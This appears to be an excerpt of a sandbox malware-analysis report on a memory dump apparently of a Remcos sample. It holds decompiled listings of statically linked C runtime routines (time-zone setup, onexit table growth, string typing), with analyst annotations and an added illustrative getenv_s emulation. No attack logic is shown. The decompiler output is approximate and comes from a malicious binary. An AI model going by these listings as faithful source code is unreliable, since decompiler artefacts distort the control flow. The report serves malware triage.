                                                                      0x0044146b
                                                                      0x00441525
                                                                      0x00441525
                                                                      0x00441529
                                                                      0x00441531
                                                                      0x00441537
                                                                      0x0044153a
                                                                      0x00441540
                                                                      0x00441542
                                                                      0x00441582
                                                                      0x00441588
                                                                      0x0044158f
                                                                      0x0044158f
                                                                      0x00441595
                                                                      0x00441599
                                                                      0x00000000
                                                                      0x0044159b
                                                                      0x0044159b
                                                                      0x0044159f
                                                                      0x004415a4
                                                                      0x004415a8
                                                                      0x004415ad
                                                                      0x004415b4
                                                                      0x004415c2
                                                                      0x004415c8
                                                                      0x004415cb
                                                                      0x004415cb
                                                                      0x00441599
                                                                      0x004415da
                                                                      0x004415e2
                                                                      0x004415eb
                                                                      0x00441544
                                                                      0x0044154a
                                                                      0x0044154d
                                                                      0x00441554
                                                                      0x00441566
                                                                      0x0044156d
                                                                      0x0044157a
                                                                      0x00000000
                                                                      0x0044157a
                                                                      0x00000000
                                                                      0x00441542
                                                                      0x0044139b
                                                                      0x00441316
                                                                      0x00000000
                                                                      0x00441316
                                                                      0x00000000
                                                                      0x00441314
                                                                      0x0044130d
                                                                      0x0044130f
                                                                      0x0044130f
                                                                      0x00000000
                                                                      0x00441299
                                                                      0x00441299
                                                                      0x00441299
                                                                      0x0044129b
                                                                      0x004412a0
                                                                      0x004412ab
                                                                      0x004412ab
                                                                      0x004410c2
                                                                      0x004410c2
                                                                      0x004410c5
                                                                      0x004410ca
                                                                      0x00441227
                                                                      0x00000000
                                                                      0x004410d0
                                                                      0x004410d2
                                                                      0x004410da
                                                                      0x004410e0
                                                                      0x004410e1
                                                                      0x004410e7
                                                                      0x004410e8
                                                                      0x004410ed
                                                                      0x004410f0
                                                                      0x004410f2
                                                                      0x004410f8
                                                                      0x004410fa
                                                                      0x004410fb
                                                                      0x004410fb
                                                                      0x00441109
                                                                      0x00441109
                                                                      0x0044110c
                                                                      0x0044110e
                                                                      0x00441111
                                                                      0x0044111f
                                                                      0x0044111f
                                                                      0x00441209
                                                                      0x00441209
                                                                      0x00000000
                                                                      0x0044120b
                                                                      0x0044120b
                                                                      0x00000000
                                                                      0x00441113
                                                                      0x00441113
                                                                      0x00441116
                                                                      0x00441119
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441119
                                                                      0x00441111
                                                                      0x004410ca
                                                                      0x004410bc
                                                                      0x0044108f
                                                                      0x00441091
                                                                      0x00441092
                                                                      0x00441095
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441095
                                                                      0x0044108d
                                                                      0x00441015
                                                                      0x00000000
                                                                      0x00441009
                                                                      0x00000000
                                                                      0x00441126
                                                                      0x00440fdc
                                                                      0x00440fd1
                                                                      0x00440fc6
                                                                      0x00440f7f
                                                                      0x00440f7f
                                                                      0x00440f81
                                                                      0x00440f83
                                                                      0x00440f84
                                                                      0x00440f85
                                                                      0x00440f86
                                                                      0x00440f8b
                                                                      0x00441216
                                                                      0x0044121b
                                                                      0x00441226
                                                                      0x00441226
                                                                      0x00440f7d
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 004421F7: RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229
                                                                      • _free.LIBCMT ref: 00440EC6
                                                                      • _free.LIBCMT ref: 00440EDD
                                                                      • _free.LIBCMT ref: 00440EFC
                                                                      • _free.LIBCMT ref: 00440F17
                                                                      • _free.LIBCMT ref: 00440F2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 3033488037-0
                                                                      • Opcode ID: 66794e6e5dd866b2328fda1afd2a329169f241d911e3389fe01e4a7f9b4ed555
                                                                      • Instruction ID: 86da635baec41bffebc5b660051239989cb1c6c0fe19470a9d99e2f9f5b67bea
                                                                      • Opcode Fuzzy Hash: 66794e6e5dd866b2328fda1afd2a329169f241d911e3389fe01e4a7f9b4ed555
                                                                      • Instruction Fuzzy Hash: A151D571A00304AFEB20DF6AC881B6A77F4EF54724B10496EEA09D7251EB79D921CB58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
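Reading note on the next listing (E004453A5): the routine itself only pushes five zeros, calls E00438659 and executes `int3`, which is the shape of a CRT abort/invalid-parameter helper. Everything after the `asm("int3")` line, starting with the `*0x46c00c ^ ebp` stack-cookie setup, is the /GS prologue of the following function that the decompiler ran into, so the apparent self-call `E004453A5(...)` at L33 is that next function calling the abort helper, not recursion. That next function reads the TZ environment variable with a getenv_s-style call (0x100-byte stack buffer; 0x22 is ERANGE), allocates a heap copy through E004421F7 (which the report's API list resolves to RtlAllocateHeap) when the stack buffer is too small, releases it through E004427C2 (evidently the CRT free) on the retry-failure path, and uses `sbb esi, esi` / `~(ptr - &buf) & ptr` to keep a pointer only when it is not the stack buffer, i.e. only when something has to be freed later. This is statically linked C runtime (LIBCMT) code, not Remcos logic, and can be skipped when triaging the dump.

The following C program is an added illustration of that control flow, written for this page; it is not code from the report, from the sample or from the CRT. It emulates MSVC getenv_s on top of a constructed fake environment (`g_fake_tz`, an assumption so the example never touches the real process environment) and mirrors the stack-then-heap buffer pattern, including the 255/256-character boundary where the heap path is taken:

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 0x100 is the stack-buffer size passed to the getenv_s-style call in the
 * decompiled routine; 0x22 is the ERANGE value it compares against. */
#define TZ_STACK_CAP 0x100
#define TZ_ERANGE    0x22

/* Constructed stand-in for the process environment (assumption: the example
 * never touches the real environment, so it is reproducible offline). */
static const char *g_fake_tz = NULL;

void set_fake_tz(const char *value) { g_fake_tz = value; }

/* Portable emulation of MSVC getenv_s(): on success copies the value into buf
 * and returns 0; when buf is too small returns ERANGE (0x22) and reports the
 * size needed, terminator included, through *required. An unset variable
 * yields 0 with *required == 0 and an empty buffer. */
int getenv_s_compat(size_t *required, char *buf, size_t cap, const char *name)
{
    const char *value = (strcmp(name, "TZ") == 0) ? g_fake_tz : NULL;
    if (cap != 0) buf[0] = '\0';
    if (value == NULL) { *required = 0; return 0; }
    *required = strlen(value) + 1;
    if (*required > cap) return TZ_ERANGE;
    memcpy(buf, value, *required);
    return 0;
}

/* Result of the lookup: the value pointer, plus the heap copy (non-NULL only
 * when the value did not fit on the stack; that is what the caller frees). */
typedef struct {
    const char *value;   /* NULL only when the lookup failed outright */
    char *heap_copy;     /* the "~(ptr - &buf) & ptr" pointer of the original */
} tz_lookup_t;

/* Mirrors the decompiled control flow:
 *   1. getenv_s(&req, stack_buf, 0x100, "TZ")
 *   2. rc == 0     -> use the stack buffer (empty string if TZ is unset)
 *   3. rc == 0x22  -> malloc(req), retry into the heap buffer,
 *                     free it if the retry fails
 *   4. keep the pointer for freeing only when it is not the stack buffer */
tz_lookup_t tz_lookup(char *stack_buf, size_t stack_cap)
{
    tz_lookup_t out = { NULL, NULL };
    size_t required = 0;
    int rc = getenv_s_compat(&required, stack_buf, stack_cap, "TZ");

    if (rc == 0) { out.value = stack_buf; return out; }
    if (rc != TZ_ERANGE) return out;             /* any other error: give up */

    char *heap = (char *)malloc(required);       /* E004421F7 -> RtlAllocateHeap */
    if (heap == NULL) return out;                /* the free(NULL) path of the original */

    size_t required2 = 0;
    if (getenv_s_compat(&required2, heap, required, "TZ") != 0) {
        free(heap);                              /* E004427C2 on the retry-failure path */
        return out;
    }
    out.value = heap;
    out.heap_copy = heap;
    return out;
}

/* Wrappers returning plain values so the behaviour is easy to check. */
int tz_value_is_on_heap(const char *tz)
{
    char stack_buf[TZ_STACK_CAP];
    set_fake_tz(tz);
    tz_lookup_t r = tz_lookup(stack_buf, sizeof stack_buf);
    int on_heap = (r.heap_copy != NULL);
    free(r.heap_copy);
    set_fake_tz(NULL);
    return on_heap;
}

size_t tz_value_length(const char *tz)
{
    char stack_buf[TZ_STACK_CAP];
    set_fake_tz(tz);
    tz_lookup_t r = tz_lookup(stack_buf, sizeof stack_buf);
    size_t n = r.value ? strlen(r.value) : 0;
    free(r.heap_copy);
    set_fake_tz(NULL);
    return n;
}

/* Builds a TZ value of len 'A' characters and reports whether the heap path
 * was taken (returns -1 on allocation failure). */
int tz_long_value_on_heap(size_t len)
{
    char *v = (char *)malloc(len + 1);
    if (v == NULL) return -1;
    memset(v, 'A', len);
    v[len] = '\0';
    int on_heap = tz_value_is_on_heap(v);
    free(v);
    return on_heap;
}

int main(void)
{
    printf("short TZ on heap : %d\n", tz_value_is_on_heap("EST5EDT"));
    printf("255-char on heap : %d\n", tz_long_value_on_heap(255));
    printf("256-char on heap : %d\n", tz_long_value_on_heap(256));
    printf("unset TZ length  : %zu\n", tz_value_length(NULL));
    return 0;
}
```

The boundary matters when reading the listing: a value of exactly 255 characters still fits the 0x100 buffer with its terminator, so the masked pointer stays NULL and nothing is freed; one more character forces the RtlAllocateHeap path and the later free.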

                                                                      C-Code - Quality: 69%
                                                                      			E004453A5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                      				int _v8;
                                                                      				int _v12;
                                                                      				int _v16;
                                                                      				int _v20;
                                                                      				signed int _v56;
                                                                      				char _v268;
                                                                      				intOrPtr _v272;
                                                                      				char _v276;
                                                                      				char _v312;
                                                                      				char _v316;
                                                                      				void* __ebp;
                                                                      				void* _t36;
                                                                      				signed int _t38;
                                                                      				signed int _t42;
                                                                      				signed int _t50;
                                                                      				void* _t54;
                                                                      				void* _t56;
                                                                      				signed int* _t61;
                                                                      				intOrPtr _t71;
                                                                      				void* _t78;
                                                                      				signed int _t85;
                                                                      				signed int _t87;
                                                                      				signed int _t89;
                                                                      				int _t93;
                                                                      				char** _t96;
                                                                      				signed int _t100;
                                                                      				signed int _t101;
                                                                      				signed int _t106;
                                                                      				signed int _t107;
                                                                      				intOrPtr _t116;
                                                                      				intOrPtr _t118;
                                                                      
                                                                      				_t88 = __edi;
                                                                      				_t96 = E00444E0F();
                                                                      				_v8 = 0;
                                                                      				_v12 = 0;
                                                                      				_v16 = 0;
                                                                      				_t36 = E00444E6D( &_v8);
                                                                      				_pop(_t78);
                                                                      				if(_t36 != 0) {
                                                                      					L19:
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					E00438659();
                                                                      					asm("int3");
                                                                      					_t106 = _t107;
                                                                      					_t38 =  *0x46c00c; // 0xe1ce05e9
                                                                      					_v56 = _t38 ^ _t106;
                                                                      					 *0x46c334 =  *0x46c334 | 0xffffffff;
                                                                      					 *0x46c328 =  *0x46c328 | 0xffffffff;
                                                                      					_push(0);
                                                                      					_push(_t96);
                                                                      					_t77 = "TZ";
                                                                      					_t89 = 0;
                                                                      					 *0x46d748 = 0;
                                                                      					_t42 = E00438A25(__eflags,  &_v316,  &_v312, 0x100, "TZ");
                                                                      					__eflags = _t42;
                                                                      					if(_t42 != 0) {
                                                                      						__eflags = _t42 - 0x22;
                                                                      						if(_t42 == 0x22) {
                                                                      							_t101 = E004421F7(_t78, _v272);
                                                                      							__eflags = _t101;
                                                                      							if(__eflags != 0) {
                                                                      								_t50 = E00438A25(__eflags,  &_v276, _t101, _v272, _t77);
                                                                      								__eflags = _t50;
                                                                      								if(_t50 == 0) {
                                                                      									E004427C2(0);
                                                                      									_t89 = _t101;
                                                                      								} else {
                                                                      									_push(_t101);
                                                                      									goto L25;
                                                                      								}
                                                                      							} else {
                                                                      								_push(0);
                                                                      								L25:
                                                                      								E004427C2();
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t89 =  &_v268;
                                                                      					}
                                                                      					asm("sbb esi, esi");
                                                                      					_t100 =  ~(_t89 -  &_v268) & _t89;
                                                                      					__eflags = _t89;
                                                                      					if(__eflags == 0) {
                                                                      						L33:
                                                                      						E004453A5(_t77, _t89, _t100, __eflags);
                                                                      					} else {
                                                                      						__eflags =  *_t89;
                                                                      						if(__eflags == 0) {
                                                                      							goto L33;
                                                                      						} else {
                                                                      							_push(_t89);
                                                                      							E004451D0(_t77, _t89, _t100, __eflags);
                                                                      						}
                                                                      					}
                                                                      					E004427C2(_t100);
                                                                      					__eflags = _v12 ^ _t106;
                                                                      					return E004318FB(_v12 ^ _t106);
                                                                      				} else {
                                                                      					_t54 = E00444E15( &_v12);
                                                                      					_pop(_t78);
                                                                      					if(_t54 != 0) {
                                                                      						goto L19;
                                                                      					} else {
                                                                      						_t56 = E00444E41( &_v16);
                                                                      						_pop(_t78);
                                                                      						if(_t56 != 0) {
                                                                      							goto L19;
                                                                      						} else {
                                                                      							E004427C2( *0x46d740);
                                                                      							 *0x46d740 = 0;
                                                                      							 *_t107 = 0x46d750;
                                                                       							// TZ not set or empty: fall back to the OS time zone. The buffer at 0x46d750 is a TIME_ZONE_INFORMATION
                                                                       							// (Bias +0, StandardName +4, StandardDate.wMonth +0x46, StandardBias +0x54, DaylightName +0x58,
                                                                       							// DaylightDate.wMonth +0x9a, DaylightBias +0xa8); 0xffffffff is TIME_ZONE_ID_INVALID
                                                                       							if(GetTimeZoneInformation(??) != 0xffffffff) {
                                                                       								_t85 =  *0x46d750 * 0x3c; // Bias is in minutes; _timezone is kept in seconds
                                                                      								_t87 =  *0x46d7a4; // 0x0
                                                                      								_push(__edi);
                                                                      								 *0x46d748 = 1;
                                                                      								_v8 = _t85;
                                                                       								_t116 =  *0x46d796; // StandardDate.wMonth
                                                                       								if(_t116 != 0) {
                                                                       									_v8 = _t85 + _t87 * 0x3c; // _timezone = (Bias + StandardBias) * 60
                                                                       								}
                                                                       								_t118 =  *0x46d7ea; // DaylightDate.wMonth
                                                                       								if(_t118 == 0) {
                                                                       									L9:
                                                                       									_v12 = 0; // _daylight = 0
                                                                       									_v16 = 0; // _dstbias = 0
                                                                       								} else {
                                                                       									_t71 =  *0x46d7f8; // DaylightBias
                                                                       									if(_t71 == 0) {
                                                                       										goto L9;
                                                                       									} else {
                                                                       										_v12 = 1; // _daylight = 1
                                                                       										_v16 = (_t71 - _t87) * 0x3c; // _dstbias = (DaylightBias - StandardBias) * 60
                                                                       									}
                                                                       								}
                                                                      								_t93 = E00441DC6(0, _t87);
                                                                       								// StandardName -> _tzname[0], at most 0x3f (63) chars; on failure or an unmappable char the name is emptied
                                                                       								if(WideCharToMultiByte(_t93, 0, 0x46d754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                                                                      									 *( *_t96) = 0;
                                                                      								} else {
                                                                      									( *_t96)[0x3f] = 0;
                                                                      								}
                                                                       								// DaylightName -> _tzname[1], same 63-char limit and failure handling
                                                                       								if(WideCharToMultiByte(_t93, 0, 0x46d7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                                                                      									 *(_t96[1]) = 0;
                                                                      								} else {
                                                                      									_t96[1][0x3f] = 0;
                                                                      								}
                                                                      							}
                                                                       							// publish the results through the CRT accessor functions (pointers to _timezone, _daylight, _dstbias)
                                                                       							 *(E00444E09()) = _v8;
                                                                       							 *(E00444DFD()) = _v12;
                                                                       							_t61 = E00444E03();
                                                                       							 *_t61 = _v16;
                                                                      							return _t61;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}

                                                                       Instruction address column (decompiler side panel) for the function above: 0x004453a5 to 0x004455df, one address per decompiled line; the GetTimeZoneInformation call sits at 0x0044540f and the two WideCharToMultiByte calls at 0x00445487 and 0x004454b4.

                                                                      APIs
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045A1E4), ref: 0044540F
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D754,000000FF,00000000,0000003F,00000000,?,?), ref: 00445487
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D7A8,000000FF,?,0000003F,00000000,?), ref: 004454B4
                                                                      • _free.LIBCMT ref: 004453FD
                                                                        • Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
                                                                        • Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA
                                                                      • _free.LIBCMT ref: 004455C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID:
                                                                      • API String ID: 1286116820-0
                                                                      • Opcode ID: 0628a2c4b3b77270a5ec950b68e299cac7762db55c065e4df2776b2e1745b1a4
                                                                      • Instruction ID: a9e19d20bde1cbb7ee37f1ab3531c36fedfced3597666ee5dbbc85eb4227c00d
                                                                      • Opcode Fuzzy Hash: 0628a2c4b3b77270a5ec950b68e299cac7762db55c065e4df2776b2e1745b1a4
                                                                      • Instruction Fuzzy Hash: 1951EC71D00615ABEF10DF69DC81AAE77B8EF44315F10026FE45097292EB789D418B5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                       			// Statically linked CRT onexit/atexit table registration, not Remcos-specific logic:
                                                                       			// __ecx points at the table descriptor (first/last/end slot pointers), __edx is the callback.
                                                                       			// All slots are stored as encoded pointers (XOR with the security cookie at 0x46c00c, then a rotate).
                                                                       			E0043FED8(signed int* __ecx, signed int __edx) {
                                                                      				signed int _v8;
                                                                      				intOrPtr* _v12;
                                                                      				signed int _v16;
                                                                      				signed int _t28;
                                                                      				signed int _t29;
                                                                      				intOrPtr _t33;
                                                                      				signed int _t37;
                                                                      				signed int _t38;
                                                                      				signed int _t40;
                                                                      				void* _t50;
                                                                      				signed int _t56;
                                                                      				intOrPtr* _t57;
                                                                      				signed int _t68;
                                                                      				signed int _t71;
                                                                      				signed int _t72;
                                                                      				signed int _t74;
                                                                      				signed int _t75;
                                                                      				signed int _t78;
                                                                      				signed int _t80;
                                                                      				signed int* _t81;
                                                                      				signed int _t85;
                                                                      				void* _t86;
                                                                      
                                                                      				_t72 = __edx;
                                                                      				_v12 = __ecx;
                                                                      				_t28 =  *__ecx;
                                                                      				_t81 =  *_t28;
                                                                      				if(_t81 != 0) {
                                                                       					_t29 =  *0x46c00c; // 0xe1ce05e9, the security cookie
                                                                       					// decode first/last/end: XOR with the cookie, then rotate by a cookie-derived count in cl
                                                                       					_t56 =  *_t81 ^ _t29;
                                                                       					_t78 = _t81[1] ^ _t29;
                                                                       					_t83 = _t81[2] ^ _t29;
                                                                       					asm("ror edi, cl");
                                                                       					asm("ror esi, cl");
                                                                       					asm("ror ebx, cl");
                                                                      					if(_t78 != _t83) {
                                                                      						L14:
                                                                      						 *_t78 = E0043F249( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                                                                      						_t33 = E00430E4E(_t56);
                                                                      						_t57 = _v12;
                                                                      						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                                                                      						_t24 = _t78 + 4; // 0x4
                                                                      						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00430E4E(_t24);
                                                                      						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00430E4E(_t83);
                                                                      						_t37 = 0;
                                                                      						L15:
                                                                      						return _t37;
                                                                      					}
                                                                       					// table full (last == end): grow it by min(count, 0x200) slots, an empty table starts at 0x20 slots
                                                                       					_t38 = 0x200;
                                                                       					_t85 = _t83 - _t56 >> 2; // current slot count
                                                                       					if(_t85 <= 0x200) {
                                                                       						_t38 = _t85;
                                                                       					}
                                                                       					_t80 = _t38 + _t85;
                                                                       					if(_t80 == 0) {
                                                                       						_t80 = 0x20;
                                                                       					}
                                                                       					if(_t80 < _t85) { // 32-bit wrap: retry with count + 4 and let the allocation fail if that wraps too
                                                                      						L9:
                                                                      						_push(4);
                                                                      						_t80 = _t85 + 4;
                                                                      						_push(_t80);
                                                                      						_v8 = E0044B846(_t56);
                                                                      						_t40 = E004427C2(0);
                                                                      						_t68 = _v8;
                                                                      						_t86 = _t86 + 0x10;
                                                                      						if(_t68 != 0) {
                                                                      							goto L11;
                                                                      						}
                                                                      						_t37 = _t40 | 0xffffffff;
                                                                      						goto L15;
                                                                      					} else {
                                                                      						_push(4);
                                                                      						_push(_t80);
                                                                      						_v8 = E0044B846(_t56);
                                                                      						E004427C2(0);
                                                                      						_t68 = _v8;
                                                                      						_t86 = _t86 + 0x10;
                                                                      						if(_t68 != 0) {
                                                                      							L11:
                                                                      							_t56 = _t68;
                                                                      							_v8 = _t68 + _t85 * 4;
                                                                      							_t83 = _t68 + _t80 * 4;
                                                                      							_t78 = _v8;
                                                                      							_push(0x20);
                                                                      							asm("ror eax, cl");
                                                                      							_t71 = _t78;
                                                                      							_v16 = 0 ^  *0x46c00c;
                                                                      							asm("sbb edx, edx");
                                                                      							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                                                                      							_v8 = _t74;
                                                                      							if(_t74 == 0) {
                                                                      								goto L14;
                                                                      							}
                                                                      							_t75 = _v16;
                                                                      							_t50 = 0;
                                                                       							do { // fill the newly added slots with the encoded NULL so they decode to 0
                                                                       								_t50 = _t50 + 1;
                                                                       								 *_t71 = _t75;
                                                                       								_t71 = _t71 + 4;
                                                                       							} while (_t50 != _v8);
                                                                      							goto L14;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      				}
                                                                      				return _t28 | 0xffffffff;
                                                                      			}
                                                                      0x0043fed8
                                                                      0x0043fee2
                                                                      0x0043fee6
                                                                      0x0043fee8
                                                                      0x0043feec
                                                                      0x0043fef6
                                                                      0x0043ff07
                                                                      0x0043ff0c
                                                                      0x0043ff0e
                                                                      0x0043ff10
                                                                      0x0043ff12
                                                                      0x0043ff14
                                                                      0x0043ff18
                                                                      0x0043ffd2
                                                                      0x0043ffe0
                                                                      0x0043ffe2
                                                                      0x0043ffe7
                                                                      0x0043ffee
                                                                      0x0043fff0
                                                                      0x0043fffe
                                                                      0x0044000d
                                                                      0x00440010
                                                                      0x00440012
                                                                      0x00000000
                                                                      0x00440013
                                                                      0x0043ff20
                                                                      0x0043ff25
                                                                      0x0043ff2a
                                                                      0x0043ff2c
                                                                      0x0043ff2c
                                                                      0x0043ff2e
                                                                      0x0043ff33
                                                                      0x0043ff37
                                                                      0x0043ff37
                                                                      0x0043ff3a
                                                                      0x0043ff59
                                                                      0x0043ff59
                                                                      0x0043ff5b
                                                                      0x0043ff5e
                                                                      0x0043ff67
                                                                      0x0043ff6a
                                                                      0x0043ff6f
                                                                      0x0043ff72
                                                                      0x0043ff77
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043ff79
                                                                      0x00000000
                                                                      0x0043ff3c
                                                                      0x0043ff3c
                                                                      0x0043ff3e
                                                                      0x0043ff47
                                                                      0x0043ff4a
                                                                      0x0043ff4f
                                                                      0x0043ff52
                                                                      0x0043ff57
                                                                      0x0043ff81
                                                                      0x0043ff84
                                                                      0x0043ff86
                                                                      0x0043ff89
                                                                      0x0043ff91
                                                                      0x0043ff97
                                                                      0x0043ff9e
                                                                      0x0043ffa0
                                                                      0x0043ffa8
                                                                      0x0043ffb7
                                                                      0x0043ffbb
                                                                      0x0043ffbd
                                                                      0x0043ffc0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043ffc2
                                                                      0x0043ffc5
                                                                      0x0043ffc7
                                                                      0x0043ffc7
                                                                      0x0043ffc8
                                                                      0x0043ffca
                                                                      0x0043ffcd
                                                                      0x00000000
                                                                      0x0043ffc7
                                                                      0x00000000
                                                                      0x0043ff57
                                                                      0x0043ff3a
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: daa148ccdb97df139992e18a93984b8390268eb3a8fbf8971ed888717db180ea
                                                                      • Instruction ID: fd9f9c647713014b17a486929e2dfe3b3c96fd0e60310b06c9fe60c82463fad1
                                                                      • Opcode Fuzzy Hash: daa148ccdb97df139992e18a93984b8390268eb3a8fbf8971ed888717db180ea
                                                                      • Instruction Fuzzy Hash: E941E236F002009FDB20DF79C881A5AB7A5EF89314F2545AAEA05EB381E735ED05CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 81%
                                                                      			E0044CE9D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				char _v16;
                                                                      				intOrPtr _v24;
                                                                      				char _v28;
                                                                      				void* _v40;
                                                                      				signed int _t34;
                                                                      				signed int _t40;
                                                                      				int _t46;
                                                                      				int _t53;
                                                                      				void* _t55;
                                                                      				int _t57;
                                                                      				signed int _t63;
                                                                      				int _t67;
                                                                      				short* _t69;
                                                                      				signed int _t70;
                                                                      				short* _t71;
                                                                      
                                                                      				_t34 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t34 ^ _t70;
                                                                      				E004370F7(__ebx,  &_v28, __edx, _a4);
                                                                      				_t57 = _a24;
                                                                      				if(_t57 == 0) {
                                                                      					_t53 =  *(_v24 + 8);
                                                                      					_t57 = _t53;
                                                                      					_a24 = _t53;
                                                                      				}
                                                                      				_t67 = 0;
                                                                      				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                      				_v12 = _t40;
                                                                      				if(_t40 == 0) {
                                                                      					L15:
                                                                      					if(_v16 != 0) {
                                                                      						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                      					}
                                                                      					return E004318FB(_v8 ^ _t70);
                                                                      				}
                                                                      				_t55 = _t40 + _t40;
                                                                      				asm("sbb eax, eax");
                                                                      				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                      					_t69 = 0;
                                                                      					L11:
                                                                      					if(_t69 != 0) {
                                                                      						E004337A0(_t67, _t69, _t67, _t55);
                                                                      						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                      						if(_t46 != 0) {
                                                                      							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                      						}
                                                                      					}
                                                                      					L14:
                                                                      					E00432753(_t69);
                                                                      					goto L15;
                                                                      				}
                                                                      				asm("sbb eax, eax");
                                                                      				_t48 = _t40 & _t55 + 0x00000008;
                                                                      				_t63 = _t55 + 8;
                                                                      				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                      					asm("sbb eax, eax");
                                                                      					_t69 = E004421F7(_t63, _t48 & _t63);
                                                                      					if(_t69 == 0) {
                                                                      						goto L14;
                                                                      					}
                                                                      					 *_t69 = 0xdddd;
                                                                      					L9:
                                                                      					_t69 =  &(_t69[4]);
                                                                      					goto L11;
                                                                      				}
                                                                      				asm("sbb eax, eax");
                                                                      				E00452F00();
                                                                      				_t69 = _t71;
                                                                      				if(_t69 == 0) {
                                                                      					goto L14;
                                                                      				}
                                                                      				 *_t69 = 0xcccc;
                                                                      				goto L9;
                                                                      			}
                                                                      0x0044cea5
                                                                      0x0044ceac
                                                                      0x0044ceb8
                                                                      0x0044cebd
                                                                      0x0044cec2
                                                                      0x0044cec7
                                                                      0x0044ceca
                                                                      0x0044cecc
                                                                      0x0044cecc
                                                                      0x0044ced1
                                                                      0x0044ceea
                                                                      0x0044cef0
                                                                      0x0044cef5
                                                                      0x0044cf94
                                                                      0x0044cf98
                                                                      0x0044cf9d
                                                                      0x0044cf9d
                                                                      0x0044cfb9
                                                                      0x0044cfb9
                                                                      0x0044cefb
                                                                      0x0044cf03
                                                                      0x0044cf07
                                                                      0x0044cf53
                                                                      0x0044cf55
                                                                      0x0044cf57
                                                                      0x0044cf5c
                                                                      0x0044cf73
                                                                      0x0044cf7b
                                                                      0x0044cf8b
                                                                      0x0044cf8b
                                                                      0x0044cf7b
                                                                      0x0044cf8d
                                                                      0x0044cf8e
                                                                      0x00000000
                                                                      0x0044cf93
                                                                      0x0044cf0e
                                                                      0x0044cf10
                                                                      0x0044cf12
                                                                      0x0044cf1a
                                                                      0x0044cf37
                                                                      0x0044cf41
                                                                      0x0044cf46
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044cf48
                                                                      0x0044cf4e
                                                                      0x0044cf4e
                                                                      0x00000000
                                                                      0x0044cf4e
                                                                      0x0044cf1e
                                                                      0x0044cf22
                                                                      0x0044cf27
                                                                      0x0044cf2b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044cf2d
                                                                      0x00000000

                                                                      APIs
